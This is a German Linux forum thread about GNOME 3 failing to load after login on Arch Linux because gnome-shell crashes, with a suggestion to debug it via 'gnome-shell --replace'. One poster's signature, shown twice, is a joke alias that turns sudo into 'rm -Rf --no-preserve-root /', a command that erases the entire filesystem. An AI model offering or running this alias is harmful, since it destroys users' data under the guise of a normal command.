Gnome lädt nach der Anmeldun nicht weiter
Ergebnis 1 bis 4 von 4

Thema: Gnome lädt nach der Anmeldun nicht weiter

  1. #1
    hat den Bogen geschlagen Avatar von Schard
    Registriert seit
    26.05.2007
    Ort
    Hannover
    Beiträge
    856

    Gnome lädt nach der Anmeldun nicht weiter

    Hallo Leute,

    ich habe gemäß des englischen Wikis unter Arch Linux 2.6.33 GNOME installiert.
    Leider passiert nach der Anmeldung nicht viel. Lediglich das Loginfenster verschwindet.
    Die .xsession-errors sagt
    Code:
    WARNING: Application 'gnome-shell.desktop' killed by signal
    Im /var/log/messages.log steht u.a:
    Code:
    kernel: gnome-shell[4845] general protection ip:7f6fee6ff452 sp:7fff62107238 error:0 in libglib-2.0.so.0.2800.6[7f6fee6e6000+ea000]
    Hat jemand eine Idee, was da schied läuft und wie ich GNOME zum Laufen bekomme?

    Danke!

    Edit: Ohne gnome-shell geht's. Ist aber nicht das gelbe vom Ei.
    Geändert von Schard (05.05.2011 um 20:51 Uhr)
    Code:
    alias sudo='/usr/bin/sudo /bin/rm -Rf --no-preserve-root / #'




  2. Inside Anonymous - Lesetipp zum Sonderpreis


     Inside Anonymous erzählt erstmalig die Geschichte dreier Mitglieder des harten Kerns:
    ihren Werdegang und ihre ganz persönliche Motivation, die sie zu überzeugten Hackern machte.
    Basierend auf vielen exklusiven Interviews bietet das Buch einen einzigartigen und spannenden
    Einblick in die Köpfe, die hinter der virtuellen Community stehen.
    Das Buch kostet bei terrashop.de jetzt statt 22,00 EUR nur noch 4,99 EUR.




    Jetzt bei terrashop.de anschauen – Nur solange der Vorrat reicht


  3. #2
    Kaiser Avatar von marcellus
    Registriert seit
    09.05.2007
    Beiträge
    1.392
    Dann ist das aber ein Problem mit der gnome-shell und nicht eins von der gnome-session.

    Aber um da genauere hintergründe zu bekommen würd ich dir raten eine normale gnome-session ohne gnome-shell zu starten und dann in einem tty "DISPLAY=":0.0" gnome-shell --replace" auszuführen und dann zu schauen, was da abgeht.

    Wieso installierst du überhaupt noch gnome-2, wenn du eh die gnome-shell verwenden willst?
    Every time you open a useless thread google cries a little tear.
    Linux is userfriendly, its just ticky about its friends.
    UselessUseOfCatAward 02.09.2007

  4. #3
    hat den Bogen geschlagen Avatar von Schard
    Registriert seit
    26.05.2007
    Ort
    Hannover
    Beiträge
    856
    Hallo Marcellus,

    erst mal danke. Werde es mal bei Gelegenheit probieren.
    Wo habe ich denn was von GNOME2 geschrieben?
    Ich benutze GNOME3 aus den Arch Repos ("extra" ists glaube ich).
    Ohne die gnome-shell sieht dies GUI allerdings aus wie GNOME2.

    MfG
    Code:
    alias sudo='/usr/bin/sudo /bin/rm -Rf --no-preserve-root / #'

  5. #4
    Kaiser Avatar von marcellus
    Registriert seit
    09.05.2007
    Beiträge
    1.392
    hmm, ich hab linux 2.6.33 mit gnome-2.33 verdreht.
    Every time you open a useless thread google cries a little tear.
    Linux is userfriendly, its just ticky about its friends.
    UselessUseOfCatAward 02.09.2007

Ähnliche Themen

  1. Gnome freeze Maus läuft weiter? (Ubuntu 9.10)
    Von blacky im Forum Debian/Ubuntu/Knoppix
    Antworten: 4
    Letzter Beitrag: 05.11.2009, 21:40
  2. Gnome lädt sich teilweise, ungewollt
    Von Uschi im Forum Gnome
    Antworten: 0
    Letzter Beitrag: 13.02.2008, 16:32
  3. Notebook schaltet nach dem Herunterfahren nicht ab sondern läuft weiter
    Von richardprause im Forum Mobile / PDA / Notebook
    Antworten: 10
    Letzter Beitrag: 27.03.2006, 15:14
  4. SSH-session nach restart weiter aktiv
    Von BiBe im Forum Anwendungen
    Antworten: 3
    Letzter Beitrag: 13.02.2005, 14:51

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •